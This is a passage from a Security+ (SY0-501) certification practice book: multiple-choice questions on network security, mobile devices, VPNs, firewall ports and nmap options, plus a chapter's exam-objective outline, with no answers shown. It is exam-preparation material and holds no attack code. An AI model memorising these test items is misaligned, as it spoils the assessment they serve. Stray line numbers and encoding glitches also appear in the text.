C. Repeater
D. Full
80. Lilly is a network administrator for a medium-sized financial services company. She wants
to implement company-wide encryption and digital signing of emails. But she is concerned
about cost, since there is a very limited budget for this. What would be her best choice?
A. SMTPS
B. S/MIME
C. IMAPS
D. PGP
81. Edward is a security manager for a bank. He has recently been reading a great deal
about malware that accesses system memory. He wants to find a solution that would
stop programs from utilizing system memory. Which of the following would be the
best solution?
A. DEP
B. FDE
C. UTM
D. IDS
82. Sarah is the CIO for a small company. She recently had the entire company’s voice calls
moved to VoIP. Her new VoIP system is using SIP with RTP. What might be the concern
with this?
A. SIP is not secure.
B. RTP is not secure.
C. RTP is too slow.
D. SIP is too slow.
83. What command would generate the output shown here?
A. nslookup
B. ipconfig
C. netstat -a
D. dig
84. Emiliano is a network administrator for a large web-hosting company. His company also
issues digital certificates to web-hosting clients. He wants to ensure that a digital certificate
will not be used once it has been revoked. He also wants to ensure that there will be
no delay between when the certificate is revoked and when browsers are made aware that
it is revoked. What solution would be best for this?
A. OCSP
B. X.509
C. CRL
D. PKI
85. Elizabeth is responsible for security at a defense contracting company. She is concerned
about users within her network exfiltrating data by attaching sensitive documents to
emails. What solution would best address this concern?
A. Email encryption
B. USB blocking
C. NIPS
D. Content filtering
86. Victor is concerned about data security on BYOD and COPE. He is concerned specifically
about data exposure should the device become lost or stolen. Which of the following
would be most effective in countering this concern?
A. Geofencing
B. Screen lock
C. GPS tagging
D. Device encryption
87. Gabriel is using nmap to scan one of his servers whose IP address is 192.168.1.1. He wants
to perform a ping scan, but the network blocks ICMP, so he will try a TCP ping scan and
do so very slowly. Which of the following would accomplish that?
A. nmap -O -PT -T1 192.168.1.1
B. nmap -O -T3 192.168.1.1
C. nmap -T -T1 192.168.1.1
D. nmap -PT -T5 192.168.1.1
88. Mary is a network administrator for ACME Company. She sometimes needs to run a
packet sniffer so that she can view the network traffic. She wants to find a well-known
packet sniffer that works on Linux. Which of the following would be her best choice?
A. Ophcrack
B. Nmap
C. Wireshark
D. Tcpdump
89. What command produced the output shown here?
A. tracert -h 10 www.chuckeasttom.com
B. tracert www.chuckeasttom.com
C. netstat www.chuckeasttom.com
D. nmap www.chuckeasttom.com
90. Daryll has been using a packet sniffer to observe traffic on his company’s network. He has
noticed that traffic between the web server and the database server is sent in clear text.
He wants a solution that will not only encrypt that traffic, but also leverage the existing
digital certificate infrastructure his company has. Which of the following would be the
best solution for Daryll?
A. TLS
B. SSL
C. IPSec
D. WPA2
91. Jarod is concerned about DLP in his organization. Employees all have cloud-based solutions
for data storage. What DLP-related security hazard, if any, might this create?
A. No security hazard
B. Malware from the cloud
C. Data exfiltration through the cloud
D. Security policies don’t apply to the cloud.
92. Derrick is a network administrator for a large company. The company network is segmented
into zones of high security, medium security, low security, and the DMZ. He is
concerned about external intruders and wishes to install a honeypot. Which is the most
important zone to put the honeypot in?
A. High security
B. Medium security
C. Low security
D. DMZ
93. Sheila is responsible for data backups for all the company servers. She is concerned about
frequency of backup and about security of the backup data. Which feature, found in some
backup utility software, would be most important to her?
A. Using data encryption
B. Digitally signing the data
C. Using automated backup scheduling
D. Hashing the backup data
94. Frank is a web server administrator for a large e-commerce company. He is concerned
about someone using netcat to connect to the company web server and retrieving detailed
information about the server. What best describes his concern?
A. Passive reconnaissance
B. Active reconnaissance
C. Banner grabbing
D. Vulnerability scanning
95. Mike is responsible for testing security at his company. He is using a tool that identifies
vulnerabilities and provides mechanisms to test them by attempting to exploit them. What
best describes this type of tool?
A. Vulnerability scanner
B. Exploit framework
C. Metasploit
D. Nessus
96. William is a security officer for a large bank. When executives’ laptops are decommissioned,
he wants to ensure that the data on those laptops is completely wiped so that it
cannot be recovered, even using forensic tools. How many times should William wipe a
hard drive?
A. 1
B. 3
C. 5
D. 7
97. You are responsible for firewalls in your organization. You are concerned about ensuring
that all firewalls are properly configured. The gateway firewall is configured as follows:
to only allow inbound traffic on a very few specific, required ports; all traffic (allowed
or blocked) is logged and logs forwarded to the SIEM. What, if anything, is missing from
this configuration?
A. Nothing, it is a good configuration.
B. Encrypting all traffic
C. Outbound connection rules
D. Digital certificate authentication for inbound traffic
98. Charles is responsible for security for web servers in his company. Some web servers are
used for an internal intranet, and some for external websites. He has chosen to encrypt
all web traffic, and he is using self-signed X.509 certificates. What, if anything, is wrong
with this approach?
A. He cannot encrypt all HTTP traffic.
B. He should use PGP certificates.
C. He should not use self-signed certificates.
D. Nothing; this is an appropriate configuration.
99. You are responsible for the security of web servers at your company. You are configuring
the WAF and want to allow only encrypted traffic to and from the web server, including
traffic from administrators using a command-line interface. What should you do?
A. Open port 80 and 23, and block port 443.
B. Open port 443 and 23, and block port 80.
C. Open port 443 and 22, and block port 80 and 23.
D. Open port 443, and block all other ports.
100. Francis is a security administrator at a large law firm. She is concerned that confidential
documents, with proprietary information, might be leaked. The leaks could be intentional
or accidental. She is looking for a solution that would embed some identifying information
into documents in such a way that it would not be seen by the reader but could be
extracted with the right software. What technology would best meet Francis’s needs?
A. Symmetric encryption
B. Steganography
C. Hashing
D. Asymmetric encryption
101. You are responsible for the gateway firewall for your company. You need to configure a
firewall to allow only email that is encrypted to be sent or received. What action should
you take?
A. Allow ports 25, 110, and 143. Block ports 465, 993, and 995.
B. Block ports 25, 110, and 143. Allow ports 465, 993, and 995.
C. Allow ports 25, 110, and 443. Block ports 465, 993, and 143.
D. Block ports 465, 994, and 464. Allow ports 25, 110, and 80.
102. Mark is responsible for security for a small bank. He has a firewall at the gateway as well
as one at each network segment. Each firewall logs all accepted and rejected traffic. Mark
checks each of these logs regularly. What is the first step Mark should take to improve his
firewall configuration?
A. Integrate with SIEM.
B. Add a honeypot.
C. Integrate with AD.
D. Add a honeynet.
103. You are setting up VPNs in your company. You are concerned that anyone running a
packet sniffer could obtain metadata about the traffic. You have chosen IPSec. What
mode should you use to accomplish your goals of preventing metadata being seen?
A. AH
B. ESP
C. Tunneling
D. Transport
104. John is responsible for configuring security devices in his network. He has implemented a
robust NIDS in his network. However, on two occasions the NIDS has missed a breach.
What configuration issue should John address?
A. False negative
B. Port blocking
C. SPI
D. False positive
105. You are responsible for communications security at your company. Your company has a
large number of remote workers, including traveling salespeople. You wish to make sure that
when they connect to the network, it is in a secure manner. What should you implement?
A. L2TP VPN
B. IPSec VPN
C. Site-to-site VPN
D. Remote-access VPN
106. Your company is issuing portable devices to employees for them to use for both work and
personal use. This is done so the company can control the security of the devices. What, if
anything, is an issue this process will cause?
A. Personal information being exposed
B. Company data being exfiltrated
C. Devices being insecurely configured
D. No issues
107. Marsha is responsible for mobile device security. Her company uses COPE for mobile
devices. All phones and tablets have a screen lock and GPS tagging. What is the next,
most important step for Marsha to take to secure the phones?
A. Implement geofencing.
B. Implement application management.
C. Implement geolocation.
D. Implement remote wipe.
108. Valerie is responsible for mobile device security at her company. The company is using
BYOD. She is concerned about employees’ personal device usage compromising company
data on the phones. What technology would best address this concern?
A. Containerization
B. Screen lock
C. Full disk encryption
D. Biometrics
109. Jack is a chief information security officer (CISO) for a small marketing company. The
company’s sales staff travel extensively and all use mobile devices. He has recently become
concerned about sideloading. Which of the following best describes sideloading?
A. Installing applications to Android devices via USB
B. Loading software on any device via WiFi
C. Bypassing the screen lock
D. Loading malware on a device without the user being aware
110. You are responsible for DLP at a large company. Some employees have COPE and others
BYOD. What DLP issue might these devices present?
A. COPE can be USB OTG.
B. BYOD can be USB OTG.
C. COPE and BYOD can be USB OTG.
D. Only jailbroken COPE or BYOD can be USB OTG.
111. John is responsible for network security at a large company. He is concerned about a
variety of attacks but DNS poisoning in particular. Which of the following protocols
would provide the most help in mitigating this issue?
A. IPSec
B. DNSSEC
C. L2TP
D. TLS
112. You are responsible for network security at your company. You have discovered that NTP
is not functioning properly. What security protocol will most likely be affected by this?
A. Radius
B. DNSSEC
C. IPSec
D. Kerberos
113. Frank is concerned about DHCP starvation attacks. He is even more worried since he
learned that anyone can download software called a “gobbler” and execute a DHCP
starvation attack. What technology would most help him mitigate this risk?
A. Encrypt all DHCP communication with TLS.
B. FDE on the DHCP server
C. Network Address Allocation
D. IPSec for all DHCP communications
114. You are trying to allocate appropriate numbers of IP addresses for various subnets in your
network. What would be the proper CIDR notation for an IPv4 subnet with 59 nodes?
A. /27
B. /29
C. /24
D. /26
115. Lydia is trying to reduce costs at her company and at the same time centralize network
administration and maintain direct control of the network. Which of the following solutions
would provide the most network administration centralization and control while
reducing costs?
A. Outsourcing network administration
B. IaaS
C. PaaS
D. Moving all OSs to open source
116. You are investigating a remote access protocol for your company to use. The protocol
needs to fully encrypt the message, use reliable transport protocols, and support a range
of network protocols. Which of the following would be the best choice?
A. RADIUS
B. Diameter
C. TACACS+
D. IPSec
117. Carrol is responsible for network connectivity in her company. The sales department is
transitioning to VoIP. What are two protocols she must allow through the firewall?
A. RADIUS and SNMP
2149B. TCP and UDP
2150C. SIP and RTP
2151D. RADIUS and SIP
2152118. John is setting up all the database servers on their own subnet. He has placed them on
215310.10.3.3/29. How many nodes can be allocated in this subnet?
2154A. 32
2155B. 16
2156C. 8
2157D. 6
2158119. Carlos is a security manager for a small company that does medical billing and records
2159management. He is using application blacklisting to prevent malicious applications from
2160being installed. What, if anything, is the weakness with this approach?
2161A. None, this is the right approach.
2162B. It might block legitimate applications.Chapter 2
2163C. It might fail to block malicious applications.
2164D. It will limit productivity.
2165120. Joanne is a security administrator for a large company. She discovered that approximately
2166100 machines on her network were recently attacked by a major virus. She is concerned
2167because there was a patch available that would have stopped the virus from having any
2168impact. What is the best solution for her to implement on her network?
2169A. Installing patch management software
2170B. Using automatic updates
2171C. Putting unpatched machines on a Bridge
2172D. Scanning all machines for patches every day
2173121. A review of your company’s network traffic shows that most of the malware infections are
2174caused by users visiting illicit websites. You want to implement a solution that will block
2175these websites, scan all web traffic for signs of malware, and block the malware before it
2176enters the company network. Which of the following technologies would be the best
2177solution?
2178A. IDS
2179B. Firewall
2180C. UTM
2181D. SIEM
2182122. You work for a large bank. The bank is trying to limit the risk associated with the use of
2183unapproved USB devices to copy documents. Which of the following would be the best
2184solution to this problem?
2185A. IDS
2186B. DLP
2187C. Content filtering
2188D. NIPS
2189123. Match the letter of the functionality with the device in the following table.
2190A. Detect intrusions on a single machine
2191B. Use aggregate logs
2192C. Filter network packets based on a set of rules
2193D. Detect intrusions on a network segment
2194Firewall
2195HIDS
2196SIEM
2197NIDS
2198124. Francine is concerned about employees in her company jailbreaking their COPE devices.
2199What would be the most critical security concern for jailbroken devices?
2200A. They would no longer get security patches.
2201B. It would disable FDE.
2202C. Unauthorized applications could be installed.
2203D. Data could be exfiltrated on these devices.
2204125. You are responsible for mobile device security in your company. Employees have COPE
2205devices. Many employees only enter the office infrequently, and you are concerned that
2206their devices are not receiving firmware updates on time. What is the best solution for this
2207problem?
2208A. Scheduled office visits for updates
2209B. OTA updates
2210C. Moving from COPE to BYOD
2211D. A policy that requires users to update their firmware regularly
2212126. Frank is looking for a remote authentication and access protocol. It must be one that uses
2213UDP due to firewall rules. Which of the following would be the best choice?
2214A. RADIUS
2215B. Diameter
2216C. TACACS +
2217D. IPSec
2218127. You have discovered that one of the employees at your company tethers her smartphone
2219to her work PC to bypass the corporate web security and access prohibited websites while
2220connected to the LAN. What would be the best way to prevent this?
2221A. Disable wireless access.
2222B. Implement a WAF.
2223C. Implement a policy against tethering.
2224D. Implement an HIPS.
2225128. You work for a large bank. One of your responsibilities is to ensure that web banking
2226logins are as secure as possible. You are concerned that a customer’s account login could
2227be compromised and someone else would use that login to access the customer’s account.
2228What is the best way to mitigate this threat?
2229A. Use SMS authentication for any logins from an unknown location or computer.
2230B. Encrypt all traffic via TLS.
2231C. Require strong passwords.
2232D. Do not allow customers to log on from any place other than their home computer.
2233129. You have discovered that some employees in your company have installed custom firm-
2234ware on their portable devices. What security flaw would this most likely lead to?
2235A. Unauthorized software can run on the device.
2236B. The device may not connect to the network.
2237C. The device will overheat.
2238D. This is not really a security issue.
2239130. You are configuring BYOD access for your company. You want the absolute most robust
2240security for the BYOD on your network. What would be the best solution?
2241A. Agentless NAC
2242B. Agent NAC
2243C. Digital certificate authentication
2244D. Two-factor authentication
2245131. You work for a large law firm and are responsible for network security. It is common for
2246guests to come to the law firm (clients, expert witnesses, etc.) who need to connect to the
2247firm’s WiFi. You wish to ensure that you provide the maximum security when these guests
2248connect with their own devices, but you also wish to provide assurance to the guest that
2249you will have minimal impact on their device. What is the best solution?
2250A. Permanent NAC agent
2251B. Agentless NAC
2252C. Dissolvable NAC agent
2253D. Implement COPE
2254132. Tom is concerned about how his company can best respond to breaches. He is interested
2255in finding a way to identify files that have been changed during the breach. What would
2256be the best solution for him to implement?
2257A. NAC
2258B. NIDS
2259C. File integrity checker
2260D. Vulnerability scanner
2261133. Mary works for a large insurance company and is responsible for cybersecurity. She is
2262concerned about insiders and wants to detect malicious activity on the part of insiders.
2263But she wants her detection process to be invisible to the attacker. What technology best
2264fits these needs?
2265A. Hybrid NIDS
2266B. Out-of-band NIDS
2267C. NIPS
2268D. NNIDS
2269134. Denish is responsible for security at a large financial services company. The company
2270frequently uses SSL/TLS for connecting to external resources. He has concerns that an
2271insider might exfiltrate data using an SSL/TLS tunnel. What would be the best solution to
2272this issue?
2273A. NIPS
2274B. SSL decryptor
2275C. NIDS
2276D. SSL accelerator
2277135. You want to allow a media gateway to be accessible through your firewall. What ports
2278should you open? (Choose two.)
2279A. 2427
2280B. 1707
2281C. 2227
2282D. 1727
2283136. Match the letter with the protocol in the following table.
2284A. Wireless security
2285B. Voice over IP
2286C. VPN
2287D. Secure command-line interface
2288IPSec
2289WPA2
2290SSH
2291SIP
2292137. Dennis is implementing wireless security throughout his network. He is using WPA2.
2293However, there are some older machines that cannot connect to WPA2—they only
2294support WEP. At least for now, he must keep these machines. What is the best solution
2295for this problem?
2296A. Put those machines on a different VLAN.
2297B. Deny wireless capability for those machines.
2298C. Put those machines on a separate wireless network with separate WAP.
2299D. Encrypt their traffic with TLS.
2300138. You are a security administrator for Acme Company. Employees in your company
2301routinely upload and download files. You are looking for a method that allows users to
2302remotely upload or download files in a secure manner. The solution must also support
2303more advanced file operations such as creating directories, deleting files, and so forth.
2304What is the best solution for this?
2305A. SFTP
2306B. SSH
2307C. SCP
2308D. IPSec
2309
2310139. Your company allows BYOD on the network. You are concerned about the risk of malicious
2311apps being introduced to your network. Which of the following policies would be most help-
2312ful in mitigating that risk?
2313A. Prohibiting apps from third-party stores
2314B. Application blacklisting
2315C. Antimalware scanning
2316D. Requiring FDE on BYOD
2317140. John is the CISO for a small company. The company has password policies, but John is
2318not sure the policies are adequate. He is concerned that someone might be able to “crackâ€
2319company passwords. What is the best way for John to determine whether his passwords
2320are vulnerable?
2321A. Run a good vulnerability scan.
2322B. Perform a password policy audit.
2323C. Use one or more password crackers himself.
2324D. Ensure that passwords are stored as a hash.
2325141. You are scanning your network using a packet sniffer. You are seeing traffic on ports
232625 and 110. What security flaw would you most likely notice on these ports?
2327A. Website vulnerabilities
2328B. Unencrypted credentials
2329C. Misconfigured FTP
2330D. Digital certificate errors
2331142. Abigail is a network administrator with ACME Company. She believes that a network
2332breach has occurred in the data center as a result of a misconfigured router access list,
2333allowing outside access to an SSH server. Which of the following should she search for
2334in the logs to confirm if such a breach occurred?
2335A. Traffic on port 23
2336B. Traffic on port 22
2337C. Unencrypted credentials
2338D. Malformed network packets
2339143. Gianna is evaluating the security of her company. The company has a number of mobile
2340apps that were developed in house for use on COPE devices. She wants to ensure that
2341these apps are updated as soon as an update is available. What should she ensure is being
2342used?
2343A. Firmware OTA
2344B. Push notifications
2345C. Scheduled updates
2346D. A policy against custom firmware
2347
2348144. Liam is concerned about the security of both COPE and BYOD devices. His company uses
2349a lot of Android-based devices, and he is concerned about users getting administrative
2350access and altering security features. What should he prohibit in his company?
2351A. Third-party app stores
2352B. Jailbreaking
2353C. Custom firmware
2354D. Rooting
2355145. Heidi works for a large company that issues various mobile devices (tablets and phones)
2356to employees. She is concerned about unauthorized access to mobile devices. Which of the
2357following would be the best way to mitigate that concern?
2358A. Biometrics
2359B. Screen lock
2360C. Context-aware authentication
2361D. Storage segmentation
2362146. You are looking for a point-to-point connection method that would allow two devices to
2363synchronize data. The solution you pick should not be affected by EMI (electromagnetic
2364interference) and should be usable over distances exceeding 10 meters, provided there is a
2365line-of-sight connection. What would be the best solution?
2366A. Bluetooth
2367B. WiFi
2368C. Infrared
2369D. RF
2370147. You wish to use nmap to scan one of your servers, whose IP address is 192.168.1.16. The
2371target is one of your own Windows servers. You want a scan that is the most thorough,
2372and you are not concerned about it being detected. Which of the following would best
2373accomplish that?
2374A. nmap -sW -sL -T1 192.168.1.16/24
2375B. nmap -sW -sT -T1 192.168.1.16
2376C. nmap -sW -sT -T5 192.168.1.16/24
2377D. nmap -sW -sT -sO -T5 192.168.1.16
2378148. What command would produce the output shown here?
2379A. nestat -a
2380B. arp -a
2381C. arp -s
2382D. netstat -s
2383149. Ethan has noticed some users on his network accessing inappropriate videos. His network
2384uses a proxy server that has content filtering with blacklisting. What is the most likely
2385cause of this issue?
2386A. Sites not on the blacklist
2387B. Misconfigured content filtering
2388C. Misconfigured proxy server
2389D. Someone circumventing the proxy server
2390150. You are looking for tools to assist in penetration testing your network. Which of the
2391following best describes Metasploit?
2392A. Hacking tool
2393B. Vulnerability scanner
2394C. Exploit framework
2395D. Network scanner
2396151. Logan is responsible for enforcing security policies in his company. There are a number of
2397policies regarding the proper configuration of public-facing servers. Which of the follow-
2398ing would be the best way for Logan to check to see if such policies are being enforced?
2399A. Periodically audit selected servers.
2400B. Implement a configuration compliance scanning solution.
2401C. Conduct routine penetration tests of those servers.
2402D. Implement a vulnerability scanning solution.
2407
Architecture and Design

The CompTIA Security+ Exam SY0-501 topics covered in this chapter include the following:

✓ 3.1 Explain use cases and purpose for frameworks, best practices and secure configuration guides.
■ Industry-standard frameworks and reference architectures
    ■ Regulatory
    ■ Non-regulatory
    ■ National vs. international
    ■ Industry-specific frameworks
■ Benchmarks/secure configuration guides
    ■ Platform/vendor-specific guides
        ■ Web server
        ■ Operating system
        ■ Application server
        ■ Network infrastructure devices
    ■ General purpose guides
■ Defense-in-depth/layered security
    ■ Vendor diversity
    ■ Control diversity
        ■ Administrative
        ■ Technical
    ■ User training

✓ 3.2 Given a scenario, implement secure network architecture concepts.
■ Zones/topologies
    ■ DMZ
    ■ Extranet
    ■ Intranet
    ■ Wireless
    ■ Guest
    ■ Honeynets
    ■ NAT
    ■ Ad hoc
■ Segregation/segmentation/isolation
    ■ Physical
    ■ Logical (VLAN)
    ■ Virtualization
    ■ Air gaps
■ Tunneling/VPN
    ■ Site-to-site
    ■ Remote access
■ Security device/technology placement
    ■ Sensors
    ■ Collectors
    ■ Correlation engines
    ■ Filters
    ■ Proxies
    ■ Firewalls
    ■ VPN concentrators
    ■ SSL accelerators
    ■ Load balancers
    ■ DDoS mitigator
    ■ Aggregation switches
    ■ Taps and port mirror
■ SDN

✓ 3.3 Given a scenario, implement secure systems design.
■ Hardware/firmware security
    ■ FDE/SED
    ■ TPM
    ■ HSM
    ■ UEFI/BIOS
    ■ Secure boot and attestation
    ■ Supply chain
    ■ Hardware root of trust
    ■ EMI/EMP
■ Operating systems
    ■ Types
        ■ Network
        ■ Server
        ■ Workstation
        ■ Appliance
        ■ Kiosk
        ■ Mobile OS
    ■ Patch management
    ■ Disabling unnecessary ports and services
    ■ Least functionality
    ■ Secure configurations
    ■ Trusted operating system
    ■ Application whitelisting/blacklisting
    ■ Disable default accounts/passwords
■ Peripherals
    ■ Wireless keyboards
    ■ Wireless mice
    ■ Displays
    ■ WiFi-enabled MicroSD cards
    ■ Printers/MFDs
    ■ External storage devices
    ■ Digital cameras

✓ 3.4 Explain the importance of secure staging deployment concepts.
■ Sandboxing
■ Environment
    ■ Development
    ■ Test
    ■ Staging
    ■ Production
■ Secure baseline
■ Integrity measurement

✓ 3.5 Explain the security implications of embedded systems.
■ SCADA/ICS
■ Smart devices/IoT
    ■ Wearable technology
    ■ Home automation
■ HVAC
■ SoC
■ RTOS
■ Printers/MFDs
■ Camera systems
■ Special purpose
    ■ Medical devices
    ■ Vehicles
    ■ Aircraft/UAV

✓ 3.6 Summarize secure application development and deployment concepts.
■ Development life-cycle models
    ■ Waterfall vs. Agile
■ Secure DevOps
    ■ Security automation
    ■ Continuous integration
    ■ Baselining
    ■ Immutable systems
    ■ Infrastructure as code
■ Version control and change management
■ Provisioning and deprovisioning
■ Secure coding techniques
    ■ Proper error handling
    ■ Proper input validation
    ■ Normalization
    ■ Stored procedures
    ■ Code signing
    ■ Encryption
    ■ Obfuscation/camouflage
    ■ Code reuse/dead code
    ■ Server-side vs. client-side execution and validation
    ■ Memory management
    ■ Use of third-party libraries and SDKs
    ■ Data exposure
■ Code quality and testing
    ■ Static code analyzers
    ■ Dynamic analysis (e.g., fuzzing)
    ■ Stress testing
    ■ Model verification
■ Compiled vs. runtime code

✓ 3.7 Summarize cloud and virtualization concepts.
■ Hypervisor
    ■ Type I
    ■ Type II
    ■ Application cells/containers
■ VM sprawl avoidance
■ VM escape protection
■ Cloud storage
■ Cloud deployment models
    ■ SaaS
    ■ PaaS
    ■ IaaS
    ■ Private
    ■ Public
    ■ Hybrid
    ■ Community
■ On-premise vs. hosted vs. cloud
■ VDI/VDE
■ Cloud access security broker
■ Security as a Service

✓ 3.8 Explain how resiliency and automation strategies reduce risk.
■ Automation/scripting
    ■ Automated courses of action
    ■ Continuous monitoring
    ■ Configuration validation
■ Templates
■ Master image
■ Non-persistence
    ■ Snapshots
    ■ Revert to known state
    ■ Rollback to known configuration
    ■ Live boot media
■ Elasticity
■ Scalability
■ Distributive allocation
■ Redundancy
■ Fault tolerance
■ High availability
■ RAID

✓ 3.9 Explain the importance of physical security controls.
■ Lighting
■ Signs
■ Fencing/gate/cage
■ Security guards
■ Alarms
■ Safe
■ Secure cabinets/enclosures
■ Protected distribution/Protected cabling
■ Airgap
■ Mantrap
■ Faraday cage
■ Lock types
■ Biometrics
■ Barricades/bollards
■ Tokens/cards
■ Environmental controls
    ■ HVAC
    ■ Hot and cold aisles
    ■ Fire suppression
■ Cable locks
■ Screen filters
■ Cameras
■ Motion detection
■ Logs
■ Infrared detection
■ Key management
1. Caroline has been asked to find a standard to guide her company’s choices in implementing information security management systems. She is looking for a standard that is international. Which of the following would be the best choice for her?
A. ISO 27002
B. ISO 27017
C. NIST 800-12
D. NIST 800-14
2. You are responsible for network security at an e-commerce company. You want to ensure that you are using best practices for the e-commerce website your company hosts. What standard would be the best for you to review?
A. OWASP
B. NERC
C. NIST
D. ISA/IEC
3. Cheryl is responsible for cybersecurity at a mid-sized insurance company. She has decided to utilize a different vendor for network antimalware than she uses for host antimalware. Is this a recommended action, and why or why not?
A. This is not recommended; you should use a single vendor for a particular security control.
B. This is recommended; this is described as vendor diversity.
C. This is not recommended; this is described as vendor forking.
D. It is neutral. This does not improve or detract from security.
4. Maria is a security administrator for a large bank. She is concerned about malware, particularly spyware that could compromise customer data. Which of the following would be the best approach for her to mitigate the threat of spyware?
A. Computer usage policies, network antimalware, and host antimalware
B. Host antimalware and network antimalware
C. Host and network antimalware, computer usage policies, and website whitelisting
D. Host and network antimalware, computer usage policies, and employee training
5. Gabriel is setting up a new e-commerce server. He is concerned about security issues. Which of the following would be the best location to place an e-commerce server?
A. DMZ
B. Intranet
C. Guest network
D. Extranet
6. Enrique is concerned about backup data being infected by malware. The company backs up key servers to digital storage on a backup server. Which of the following would be most effective in preventing the backup data being infected by malware?
A. Place the backup server on a separate VLAN.
B. Air-gap the backup server.
C. Place the backup server on a different network segment.
D. Use a honeynet.
7. Janelle is the security administrator for a small company. She is trying to improve security throughout the network. Which of the following steps should she take first?
A. Implement antimalware on all computers.
B. Implement acceptable use policies.
C. Turn off unneeded services on all computers.
D. Turn on host-based firewalls on all computers.
8. Mary is the CISO for a mid-sized company. She is attempting to mitigate the danger of computer viruses. Which administrative control can she implement to help achieve this goal?
A. Implement host-based antimalware.
B. Implement policies regarding email attachments and file downloads.
C. Implement network-based antimalware.
D. Block portable storage devices from being connected to computers.
9. You are the network administrator for a large company. Your company frequently has nonemployees in the company such as clients and vendors. You have been directed to provide these nonemployees with access to the Internet. Which of the following is the best way to implement this?
A. Establish a guest network.
B. Allow nonemployees to connect only to the DMZ.
C. Allow nonemployees to connect only to the intranet.
D. Establish limited accounts on your network for nonemployees to use.
10. Juan is a network administrator for an insurance company. His company has a number of traveling salespeople. He is concerned about confidential data on their laptops. What is the best way for him to address this?
A. FDE
B. TPM
C. SDN
D. DMZ
11. Terrance is responsible for secure communications on his company’s network. The company has a number of traveling salespeople who need to connect to network resources. What technology would be most helpful in addressing this need?
A. VPN concentrator
B. SSL accelerator
C. DMZ
D. Guest network
12. Mohaned is concerned about malware infecting machines on his network. One of his concerns is that malware would be able to access sensitive system functionality that requires administrative access. What technique would best address this issue?
A. Implementing host-based antimalware
B. Using a nonadministrative account for normal activities
C. Implementing FDE
D. Making certain the operating systems are patched
13. John works for an insurance company. His company uses a number of operating systems, including Windows and Linux. In this mixed environment, what determines the network operating system?
A. The OS of the DNS server
B. The OS of the domain controller
C. The OS of the majority of servers
D. The OS of the majority of client computers
14. Juanita is implementing virtualized systems in her network. She is using Type I hypervisors. What operating system should be on the machines for her to install the hypervisor?
A. None
B. Windows
C. Any operating system
D. Windows or Linux
15. You are responsible for security at your company. You want to improve cloud security by following the guidelines of an established international standard. What standard would be most helpful?
A. NIST 800-14
B. NIST 800-53
C. ISO 27017
D. ISO 27002
16. You are responsible for setting up a kiosk computer that will be in your company’s lobby. It will be accessible for visitors to locate employee offices, obtain the guest WiFi password, and retrieve general public company information. What is the most important thing to consider when configuring this system?
A. Using a strong administrator password
B. Limiting functionality to only what is needed
C. Using good antivirus protection
D. Implementing a host-based firewall
17. You are concerned about peripheral devices being exploited by an attacker. Which of the following is the first step you should take to mitigate this threat?
A. Disable WiFi for any peripheral that does not absolutely need it.
B. Enable BIOS protection for peripheral devices.
C. Use strong encryption on all peripheral devices.
D. Configure antivirus on all peripherals.
18. Which design concept limits access to systems from outside users while protecting users and systems inside the LAN?
A. DMZ
B. VLAN
C. Router
D. Guest network
19. Which of the following is the equivalent of a VLAN from a physical security perspective?
A. Perimeter security
B. Partitioning
C. Security zones
D. Firewall
20. In an attempt to observe hacker techniques, a security administrator configures a nonproduction network to be used as a target so that he can covertly monitor network attacks. What is this type of network called?
A. Active detection
B. False subnet
C. IDS
D. Honeynet
21. You have instructed all administrators to disable all nonessential ports on servers at their sites. Why are nonessential protocols a security issue that you should be concerned about?
A. Nonessential ports provide additional areas of attack.
B. Nonessential ports can’t be secured.
C. Nonessential ports are less secure.
D. Nonessential ports require more administrative effort to secure.
22. Which type of firewall examines the content and context of each packet it encounters?
A. Packet filtering firewall
B. Stateful packet filtering firewall
C. Application layer firewall
D. Gateway firewall
23. Which of the following would prevent a user from installing a program on a company-owned mobile device?
A. Whitelisting
B. Blacklisting
C. ACL
D. HIDS
24. You’re designing a new network infrastructure so that your company can allow unauthenticated users connecting from the Internet to access certain areas. Your goal is to protect the internal network while providing access to those areas. You decide to put the web server on a separate subnet open to public contact. What is this subnet called?
A. Guest network
B. DMZ
C. Intranet
D. VLAN
25. Upper management has decreed that a firewall must be put in place immediately, before your site suffers an attack similar to one that struck a sister company. Responding to this order, your boss instructs you to implement a packet filter by the end of the week. A packet filter performs which function?
A. Prevents unauthorized packets from entering the network
B. Allows all packets to leave the network
C. Allows all packets to enter the network
D. Eliminates collisions in the network
26. You’re outlining your plans for implementing a wireless network to upper management. Which protocol was designed to provide security for a wireless network and is considered equivalent to the security of a wired network?
A. WAP
B. WPA
C. WPA2
D. WEP
27. An IV attack is usually associated with which of the following wireless protocols?
A. WEP
B. WAP
C. WPA
D. WPA2
28. Suzan is responsible for application development in her company. She wants to have all web applications tested prior to being deployed live. She wants to use a test system that is identical to the live server. What is this called?
A. Production server
B. Development server
C. Test server
D. Predeployment server
29. John is responsible for security in his company. He is implementing a kernel integrity subsystem for key servers. What is the primary benefit of this action?
A. To detect malware
B. To detect whether files have been altered
C. To detect rogue programs being installed
D. To detect changes to user accounts
30. You are responsible for BIOS security in your company. Which of the following is the most fundamental BIOS integrity technique?
A. Verifying the BIOS version
B. Using a TPM
C. Managing BIOS passwords
D. Backing up the BIOS
31. You have been asked to implement security for SCADA systems in your company. Which of the following standards will be most helpful to you?
A. NIST 800-82
B. PCI-DSS
C. NIST 800-30
D. ISO 27002
32. Joanne works for a large insurance company. Some employees have wearable technology, such as smart watches. What is the most significant security concern from such devices?
A. These devices can distract employees.
B. These devices can be used to carry data in and out of the company.
C. These devices may not have encrypted drives.
D. These devices may not have strong passwords.
33. John is installing an HVAC system in his datacenter. What will this HVAC have the most impact on?
A. Confidentiality
B. Availability
C. Fire suppression
D. Monitoring access to the datacenter
34. Maria is a security engineer with a manufacturing company. During a recent investigation, she discovered that an engineer’s compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. What should Maria do to mitigate this threat?
A. Install host-based antivirus software on the engineer’s system.
B. Implement account usage auditing on the SCADA system.
C. Implement an NIPS on the SCADA system.
D. Use FDE on the engineer’s system.
35. Lucy works as a network administrator for a large company. She needs to administer several servers. Her objective is to make it easy to administer and secure these servers, as well as making the installation of new servers more streamlined. Which of the following best addresses these issues?
A. Setting up a cluster
B. Virtualizing the servers
C. Putting the servers on a VLAN
D. Putting the servers on a separate subnet
36. Gerard is responsible for secure communications with his company’s e-commerce server. All communications with the server use TLS. What is the most secure option for Gerard to store the private key on the e-commerce server?
A. HSM
B. FDE
C. SED
D. SDN
